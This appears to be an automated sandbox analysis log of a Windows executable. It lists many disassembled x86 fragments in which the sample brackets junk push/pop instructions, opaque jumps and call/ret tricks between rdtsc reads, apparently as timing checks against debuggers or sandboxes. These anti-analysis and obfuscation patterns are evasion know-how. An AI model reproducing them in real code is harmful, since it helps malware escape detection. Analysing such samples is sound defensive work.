Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10FD2FC second address: 10FD34E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD937h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jo 00007F9308CAD935h 0x00000014 jmp 00007F9308CAD92Fh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F9308CAD938h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1082E17 second address: 1082E1C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101243 second address: 1101251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F9308CAD926h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101251 second address: 110125B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F930851C676h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110125B second address: 1101262 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110152D second address: 1101531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11016A5 second address: 11016AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11016AA second address: 11016B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1101ADF second address: 1101AEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F9308CAD926h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1105E43 second address: 1105E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F930851C676h 0x0000000a pop ecx 0x0000000b push edi 0x0000000c jmp 00007F930851C67Eh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1105E60 second address: 1105E75 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F9308CAD92Ch 0x00000008 pop edi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B064 second address: 110B084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F930851C689h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B226 second address: 110B22B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B22B second address: 110B253 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F930851C67Ch 0x00000008 jl 00007F930851C676h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F930851C686h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110B253 second address: 110B257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 110AC57 second address: 110AC77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F930851C676h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007F930851C676h 0x00000013 jc 00007F930851C676h 0x00000019 jc 00007F930851C676h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D02 second address: 10D6D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D08 second address: 10D6D68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 js 00007F930851C67Ch 0x0000000e jnp 00007F930851C678h 0x00000014 popad 0x00000015 nop 0x00000016 pushad 0x00000017 ja 00007F930851C679h 0x0000001d xor dword ptr [ebp+122D2FA7h], edi 0x00000023 popad 0x00000024 sub dword ptr [ebp+122D1EBBh], esi 0x0000002a lea eax, dword ptr [ebp+1248EB42h] 0x00000030 push 00000000h 0x00000032 push edi 0x00000033 call 00007F930851C678h 0x00000038 pop edi 0x00000039 mov dword ptr [esp+04h], edi 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc edi 0x00000046 push edi 0x00000047 ret 0x00000048 pop edi 0x00000049 ret 0x0000004a push eax 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6D68 second address: 10B2E7B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9308CAD92Dh 0x0000000c jmp 00007F9308CAD931h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F9308CAD928h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 jc 00007F9308CAD926h 0x00000036 xor dword ptr [ebp+122D2F7Ah], edx 0x0000003c call dword ptr [ebp+122D19EAh] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jnl 00007F9308CAD926h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6E98 second address: 10D6E9D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6F38 second address: 10D6F3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D6F3C second address: 10D6F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007F930851C678h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D71F6 second address: 10D71FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7286 second address: 10D72B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 6BAD547Fh 0x0000000d sub ecx, dword ptr [ebp+122D3840h] 0x00000013 push 3F6707E7h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F930851C686h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7366 second address: 10D736C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7408 second address: 10D7418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F930851C680h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D775D second address: 10D7767 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9308CAD926h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7767 second address: 10D77BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C686h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F930851C678h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 or cl, 00000064h 0x00000029 mov edx, eax 0x0000002b push 00000004h 0x0000002d jmp 00007F930851C680h 0x00000032 push eax 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7C6E second address: 10D7C74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D7C74 second address: 10D7C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push ebx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D8011 second address: 10D8015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D8015 second address: 10D801B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D801B second address: 10D80A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9308CAD928h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F9308CAD928h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 lea eax, dword ptr [ebp+1248EB86h] 0x0000002f push 00000000h 0x00000031 push ecx 0x00000032 call 00007F9308CAD928h 0x00000037 pop ecx 0x00000038 mov dword ptr [esp+04h], ecx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ecx 0x00000045 push ecx 0x00000046 ret 0x00000047 pop ecx 0x00000048 ret 0x00000049 nop 0x0000004a pushad 0x0000004b jc 00007F9308CAD928h 0x00000051 push ebx 0x00000052 pop ebx 0x00000053 pushad 0x00000054 jmp 00007F9308CAD92Eh 0x00000059 jmp 00007F9308CAD935h 0x0000005e popad 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ecx 0x00000064 pushad 0x00000065 popad 0x00000066 pop ecx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D80A8 second address: 10D80E5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F930851C678h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F930851C678h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 lea eax, dword ptr [ebp+1248EB42h] 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f je 00007F930851C676h 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 10D80E5 second address: 10D80EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C21D second address: 117C23D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F9308CAD932h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C515 second address: 117C519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C519 second address: 117C54A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 jmp 00007F9308CAD938h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C54A second address: 117C555 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F930851C676h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6BA second address: 117C6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6C0 second address: 117C6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C6C8 second address: 117C71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9308CAD937h 0x0000000a pushad 0x0000000b jmp 00007F9308CAD92Ah 0x00000010 jmp 00007F9308CAD92Fh 0x00000015 jmp 00007F9308CAD933h 0x0000001a jng 00007F9308CAD926h 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C71F second address: 117C725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C725 second address: 117C72B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C72B second address: 117C731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C731 second address: 117C739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117C739 second address: 117C73D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117D188 second address: 117D192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 117D192 second address: 117D196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1180148 second address: 1180150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1180150 second address: 1180156 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BB3AF second address: 11BB3B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11C3221 second address: 11C324E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C689h 0x00000007 js 00007F930851C676h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jng 00007F930851C67Eh 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7A5 second address: 11BD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7B6 second address: 11BD7D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C67Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b jng 00007F930851C676h 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11BD7D1 second address: 11BD7F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD938h 0x00000009 jno 00007F9308CAD926h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF201 second address: 11CF207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF207 second address: 11CF20D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF20D second address: 11CF235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F930851C685h 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F930851C676h 0x00000012 jnl 00007F930851C676h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF235 second address: 11CF251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9308CAD92Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jl 00007F9308CAD93Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF251 second address: 11CF255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF255 second address: 11CF259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF090 second address: 11CF094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF094 second address: 11CF0B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9308CAD92Dh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0B2 second address: 11CF0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0BD second address: 11CF0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD930h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11CF0D1 second address: 11CF0D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D0765 second address: 11D0769 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D0769 second address: 11D0799 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F930851C688h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F930851C67Fh 0x0000000f pop edx 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D3019 second address: 11D302F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD932h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D302F second address: 11D3033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 11D3033 second address: 11D3048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9308CAD92Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994AB second address: 12994AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994AF second address: 12994B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994B3 second address: 12994B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12994B9 second address: 12994BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129831A second address: 1298340 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F930851C676h 0x00000009 jmp 00007F930851C686h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298340 second address: 129834A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F9308CAD926h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298496 second address: 12984A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jnp 00007F930851C676h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12987B9 second address: 12987BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 12987BD second address: 12987D4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F930851C67Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129891B second address: 1298920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 1298920 second address: 129892D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\iuO4kwUi17.exeRDTSC instruction interceptor: First address: 129892D second address: 1298933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
